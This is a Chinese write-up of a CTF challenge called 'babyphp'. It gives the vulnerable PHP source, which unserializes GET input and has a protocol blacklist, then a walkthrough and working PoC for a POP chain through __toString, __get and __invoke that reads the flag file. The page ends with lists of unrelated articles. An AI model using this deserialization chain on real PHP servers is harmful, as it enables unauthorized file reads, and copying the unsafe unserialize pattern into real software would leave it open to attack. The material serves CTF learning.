京津冀大学生竞赛:babyphp

比赛的时候没做出来,回来以后一会就做出来了,难受。。。还是基本功不扎实,都不记得__invoke怎么触发的了

放上源码

<?php

error_reporting(1);

class Read {

    public $var;

    public function file_get($value)

    {

        $text = base64_encode(file_get_contents($value));

        return $text;

    }

    public function __invoke(){

        $content = $this->file_get($this->var);

        echo $content;

    }

}

class Show

{

    public $source;

    public $str;

    public function __construct($file='index.php')

    {

        $this->source = $file;

        echo $this->source.'瑙f瀽寮€濮?'."<br>";

    }

    public function __toString()

    {

        $this->str['str']->source;

    }

    public function _show()

    {

        if(preg_match('/http|https|file:|gopher|dict|\.\.|fllllllaaaaaag/i',$this->source)) {

            die('hacker!');

        } else {

            highlight_file($this->source);

        }

    }

    public function __wakeup()

    {

        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {

            echo "hacker~";

            $this->source = "index.php";

        }

    }

}

class Test

{

    public $params;

    public function __construct()

    {

        $this->params = array();

    }

    public function __get($key)

    {

        $func = $this->params;

        return $func();

    }

}

if(isset($_GET['chal']))

{

    $chal = unserialize($_GET['chal']);

}

else

{

    $show = new Show('index.php');

    $show->_show();

}

官方给的hint是

babyphp提示:php反序列化链构造、魔术方法__toString、__wakeup()、__invoke()、__get()

其实没什么用,很明显是反序列化。关键是pop链的构造思路。

我找pop链的思路一般是

  • 1、找__destruct()__toString()这样容易触发反序列化的魔术方法,这是pop链的起点
  • 2、找能利用来getflag的函数,例如file_get_contents()这种,这是pop链的终点
  • 3、最后从终点慢慢一环一环往回推,推回起点就成功构造出pop链

本题中pop链的起点应该是Show::__toString(),然后寻找可用的echo,第一眼看到的就还是Show::__construct(),还有一处Read::__invoke中的echo其实是最后getflag的地方。我们带着这个思路走下去,那么Read::__invoke就是pop链的终点。

__invoke()触发条件是

当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。

可以发现Test::__get()中有

$func = $this->params;

return $func();

继续回推,__get()的触发方法是

读取不可访问属性的值时,__get() 会被调用。

我们发现Show::__toString()中有$this->str['str']->source;,完美

最终poc如下

<?php

error_reporting(3);

class Read {

    public $var;

}

class Show

{

    public $source;

    public $str;

}

class Test

{

    public $params;

}

$c = new Read();

$c->var = 'fllllllaaaaaag';

$b = new Test();

$b->params = $c;

$d = new Show();

$d->str = array('str'=>$b);

$a = new Show();

$a->source = $d;

echo serialize($a);

京津冀大学生竞赛:babyphp的更多相关文章

  1. 想在京津冀地区找个UI&UE的工作靠啥?看看这篇博客

    文章目的 本篇文章针对京津冀计算机专业应届毕业生,求职UI相关行业,提供数据参考. 本篇文章试用对象 UI相关培训机构 计算机设计相关培训机构 高职专科类学院计算机相关专业 就业参考网站 智联招聘 拉 ...

  2. O准备如何苟进复赛圈?华为软挑开挂指南(附赛题预测)

    事先声明,这不是华为软挑的软广,我也不是海军. 这篇文章纯粹是心血来潮,原因是去年上传到github的参赛代码,前几天又有两个人star和fork了. 记得star热潮还是去年4月复赛刚结束的那几天, ...

  3. 公司-ofo:ofo

    ylbtech-公司-ofo:ofo ofo小黄车是一个无桩共享单车出行平台,缔造了“无桩单车共享”模式,致力于解决城市出行问题.用户只需在微信公众号或App扫一扫车上的二维码或直接输入对应车牌号,即 ...

  4. 快消品迎来B2B元年,行业将如何变革?

    一年接近尾声,又到了年终总结的时候,宴会厅里传来各种激情澎湃的演讲,有的行业遍地开花.欢声笑语不绝于耳:有的行业却没能迎来"昨夜东风",只能嗟叹"不堪回首".2 ...

  5. php大力力 [055节] 大力力阅读文章集锦

    php大力力 [055节] 效率低啊,效率低 啥也不说了,先把网页挨个保存一下,关闭网页窗口 从 2015-09-11 10:58 到 2015-09-11 12:38 共用了100分钟,整理最近几天 ...

  6. Smarty模板技术学习(二)

    本文主要包括以下内容 公共文件引入与继承 内容捕捉 变量调剂器 缓存 Smarty过滤器 数据对象.注册对象 与已有项目结合 公共文件引入与继承 可以把许多模板页面都用到的公共页面放到单独文件里边,通 ...

  7. 中国各城市PM2.5数据间的相关分析

    code{white-space: pre;} pre:not([class]) { background-color: white; }if (window.hljs && docu ...

  8. HTML网页插入图像

    一.WEB上支持的图片格式: GIF:能保存256中颜色,支持透明色,支持动画效果 JPEG:不支持透明色和动画,颜色可达1670种 PNG:支持透明色,不支持动画,颜色有几种到1670种 二.将图片 ...

  9. LTP 分词算法实践

    参考链接: https://github.com/HIT-SCIR/ltp/blob/master/doc/install.rst http://www.xfyun.cn/index.php/serv ...

随机推荐

  1. python 工厂方法

    工厂方法模式(FACTORY METHOD)是一种常用创建型设计模式,此模式的核心精神是封装类中变化的部分,提取其中个性化善变的部分为独立类, 通过依赖注入以达到解耦.复用和方便后期维护拓展的目的. ...

  2. python day 18: thinking in UML与FTP作业重写

    目录 python day 18 1. thinking in UML读书小感 2. FTP作业重写 2.1 软件目录结构 2.2 FTPClient端脚本 2.3 FTPServer端脚本 pyth ...

  3. koa2--nodemailer实现邮箱验证

    依赖包安装: /** * koa-bodyparser用于把formData数据解析到ctx.request.body * 通过ctx.request.body访问请求的参数 * koa-redis用 ...

  4. Java 之 Request 对象

    一.Request 对象和 Response 对象原理 request和response对象是由服务器创建的,供我们使用的. request对象是来获取请求消息,response对象是来设置响应消息. ...

  5. 交换ESCHAUNGE英语ESCHAUNGE交易所

    exchange From Middle English eschaunge, borrowed from Anglo-Norman eschaunge exchange 1.An act of ex ...

  6. caement Archaic spelling of cement

    caement Archaic spelling of cement. caement Alternative forms[edit] caement (archaic) cæment (archai ...

  7. python多任务的实现:线程,进程,协程

    什么叫“多任务”呢?简单地说,就是操作系统可以同时运行多个任务.打个比方,你一边在用浏览器上网,一边在听MP3,一边在用Word赶作业,这就是多任务,至少同时有3个任务正在运行.还有很多任务悄悄地在后 ...

  8. Solr基础知识一(安装配置)

    最近接到需求,要修改网站内的搜索规则,就去看了下Solr的资料.现在做完需求了,回来做一些笔记,方便以后查找. 一.安装 1.1 配置JDK JDK下载地址为:https://www.oracle.c ...

  9. influxDB应用及TICK stack

    InfluxData平台用于处理度量和事件的时间序列平台,常被称为TICK stack,包含4个组件:Telegraf,influxDB,Chronograf和Kapacitor,分别负责时间序列数据 ...

  10. freebsd xfce桌面安装scim输入法,安装成功。

    前言: 1.没有用handbook推荐的登陆组本地化方法,用的方法2:shell启动文件本地化方法(因为我不知道方法1里一些环境变量该大写还是小写,不想试了). 2.没有用登陆管理器,用xdm登录管理 ...